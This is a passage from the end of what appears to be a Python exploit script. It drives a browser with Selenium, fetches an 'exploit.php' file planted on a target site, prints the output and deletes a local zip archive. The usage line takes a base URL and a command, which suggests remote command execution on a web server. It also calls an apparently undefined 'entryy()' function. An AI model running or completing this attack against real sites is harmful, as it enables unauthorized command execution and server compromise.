        alert = driver.switch_to.alert  
        alert.accept()

        # Exploit result   
        exploit_url = base_url + "exploit.php"  
        response = requests.get(exploit_url)  
        print(f"[+] Exploit response:\n\n{response.text}")

    except Exception as e:  
        print(f"[!] Error: {e}")  
    finally:  
        driver.quit()  
        if zip_filename and os.path.exists(zip_filename):  
            os.remove(zip_filename)

if __name__ == "__main__":  
    entryy()  
    if len(sys.argv) < 3:  
        print("Usage: python script.py [BASE_URL] [COMMAND]")  
    else:  
        main(sys.argv[1], sys.argv[2])

Tag

#linux